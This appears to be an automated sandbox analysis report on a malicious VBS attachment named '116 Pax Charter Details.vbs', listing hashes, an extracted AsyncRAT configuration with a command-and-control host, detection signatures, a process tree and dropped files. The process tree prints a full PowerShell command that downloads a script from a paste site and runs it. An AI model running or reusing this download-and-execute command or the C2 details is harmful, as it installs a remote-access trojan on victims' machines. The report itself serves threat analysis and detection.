Analysis
-
max time kernel
80s -
max time network
612s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
14-04-2022 15:34
Static task
static1
Behavioral task
behavioral1
Sample
116 Pax Charter Details.vbs
Resource
win7-20220414-en
General
-
Target
116 Pax Charter Details.vbs
-
Size
57KB
-
MD5
52d94e55aac61768976f39040c288eef
-
SHA1
e942fa64351f106b614b28e86d3a42d50e5a0443
-
SHA256
fcd18b069a963b01f447b35ac7f12421ac36f8c577a1f19880ea0258e0505747
-
SHA512
fe278c9483992b979e356ec4380182d7519d47144cf3ed9c9caaf0346c4bcb788272562f57264ac7a3a35bf67e9e36ac19ec5d5a07d9564a99360de77b72b717
Malware Config
Extracted
https://textbin.net/raw/x6lfwhnyrz
Extracted
asyncrat
1.0.7
Default
crazydns.linkpc.net:5900
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Meta Stealer Stealer
Meta Stealer steals passwords stored in browsers, written in C++.
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)
-
Async RAT payload 4 IoCs
resource yara_rule behavioral2/memory/3148-232-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/3148-233-0x000000000040CBCE-mapping.dmp asyncrat behavioral2/memory/3148-248-0x00000000095A0000-0x00000000095B0000-memory.dmp asyncrat behavioral2/memory/3148-263-0x000000000AD10000-0x000000000AD74000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 2 1324 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChromeUpdateHost.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1828 set thread context of 3148 1828 powershell.exe 72 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
pid Process 1288 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1324 powershell.exe 1324 powershell.exe 1324 powershell.exe 1828 powershell.exe 1828 powershell.exe 1828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1828 powershell.exe Token: SeDebugPrivilege 3148 AppLaunch.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 64 wrote to memory of 1324 64 WScript.exe 67 PID 64 wrote to memory of 1324 64 WScript.exe 67 PID 1324 wrote to memory of 1828 1324 powershell.exe 69 PID 1324 wrote to memory of 1828 1324 powershell.exe 69 PID 1828 wrote to memory of 3928 1828 powershell.exe 70 PID 1828 wrote to memory of 3928 1828 powershell.exe 70 PID 3928 wrote to memory of 2744 3928 csc.exe 71 PID 3928 wrote to memory of 2744 3928 csc.exe 71 PID 1828 wrote to memory of 3148 1828 powershell.exe 72 PID 1828 wrote to memory of 3148 1828 powershell.exe 72 PID 1828 wrote to memory of 3148 1828 powershell.exe 72 PID 1828 wrote to memory of 3148 1828 powershell.exe 72 PID 1828 wrote to memory of 3148 1828 powershell.exe 72 PID 1828 wrote to memory of 3148 1828 powershell.exe 72 PID 1828 wrote to memory of 3148 1828 powershell.exe 72 PID 1828 wrote to memory of 3148 1828 powershell.exe 72 PID 3148 wrote to memory of 3188 3148 AppLaunch.exe 74 PID 3148 wrote to memory of 3188 3148 AppLaunch.exe 74 PID 3148 wrote to memory of 3188 3148 AppLaunch.exe 74 PID 3188 wrote to memory of 1288 3188 cmd.exe 76 PID 3188 wrote to memory of 1288 3188 cmd.exe 76 PID 3188 wrote to memory of 1288 3188 cmd.exe 76
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\116 Pax Charter Details.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/x6lfwhnyrz'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\x6lfwhnyrz.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1'2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS13⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ttrfgfuw\ttrfgfuw.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD38.tmp" "c:\Users\Admin\AppData\Local\Temp\ttrfgfuw\CSCC1D4DB35A7DE4D4381D55A736C3DEC7A.TMP"5⤵PID:2744
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA42F.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:1288
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53fb7f9b6c8c061d1a91a99c05f205dbc
SHA1b8956e5dfaa8b012fa1c21536acffb877fec37c8
SHA256e41b989f4d22e01403729e5e5b2423ece983d7407e7409e0e6d350ee8bba9166
SHA512f6b6dcb58956c8a90b0432d4e18797d8152aa182b621f5836f9dad1f100846c2c2c2085742a2c4ba414eeef1d528d98a2baae1e797d259cb2839ac427582ab4c
-
Filesize
1KB
MD51ca2f096b6b7bd6ee219a00ea4281a41
SHA1478c14065a000c81611825b3c9eb7f0c891c0b4b
SHA256c6f5c20fdcf1bf77ddf53e98958f3ecce9894d400ecb621fef485c2a5446512f
SHA512a9d331f023c3520b37f7d29f8230773b206845627e154ae64cc1f7ac4ded08a2bb9716a093f70fceb21a19156fdd93eddc6ba4c50e3db7d3559ffbb259ef3ea4
-
Filesize
173B
MD53666e5cf6f2c1cc561e09805f8bf728b
SHA126c0b59b4c6ddcf4191eb9e9cc8bc4b1b967b25b
SHA256f73f0a5bf054a72a51db03f3776bf74f665f6fec044a375e2461e0a58f3a54f3
SHA5123b1bb8212791402a6ab3e4a4d177861ae01a14567e844f5fb3aed810101d19294788906e1418441c369664f39c0887993719b7069726818c9b09cc7bdd3114b1
-
Filesize
11KB
MD512ab9b237bb49f00ecaf556f74c995c4
SHA1837a7617d3a394a40da8eec4e79d1a78988e6ba3
SHA2561c7af518be71b97778407d76c2845dffe553567de16f9c1e68cf97ebf8cf80d5
SHA512e79c5545c187d7735bd94eb3242f521faaf74bdbd349601779cb47b7eb1b4f8c82e4e6297b2d54704ede93c55ec75d31fd07156ce5c0cb3d69f41de744e0347e
-
Filesize
119KB
MD58a4c64e0dc47055ac4df009b38c5c442
SHA11cfade9c2531a2721261df5f323b918a96fe6db7
SHA2568d6d23ec88918ca2a42e1f578fa0d353bc6c93a557c9cf77a0704964fd9c9f8e
SHA51218911c1ee6c579b5a4ceb79b0b7fe77f4e2af500a0851cbca9c67f2f852517ff25f352820c30dcde0081a99752765ae5d6d77d68f0d80056ac194fff4ee565f9
-
Filesize
652B
MD544c446c277e8073520f6a5f0b13b9331
SHA15e4e22548ceb17ca019b11c637d6ec06c04f3b69
SHA2568945a00cabe7127c754c49f2c974b7948f8721bf4adb17e69c8fc4d413d40886
SHA51285506b438d5c6fc0b1dde291f7e17a69c7e05ee10ecb83b05c164d57164d1abd6c694cb19381fed5d865afbabcb43f61155c25aba98a57c1746596a1c9ce06fd
-
Filesize
14KB
MD55b28648a4e188b0ebdf2d5edcda61624
SHA1faf0ba6c2ef8d8184881eda8a276796449969e1c
SHA256e92acafc5a9dd128b120809aaf76178275c3d22b13fb7cc2f0d9c624befed1b1
SHA512972fca6205f8927363b751ff51c6cf07c3b42f7cbd8fbe12c1098df539118ecf3d3ce1af3b5d376c8710ed183786fc911279ff81941aba4202a11ca5670b9937
-
Filesize
327B
MD56e245703f24e0db1dd6b1e42da7a4962
SHA1cdc61732bb6fef242ff5903917a38c96dba53bfc
SHA256242588558957ef2b0bb35064f782ac8b4c45eb9d195b8f12e409933ec0fbb113
SHA512d11eb333eacd5a5de0a13276a57ca07ea0defa5af3428990553b6a3448d865c7ba29c9024166193c241a39698e3d3e707351b5f4f0152d3e5294bb85270ef345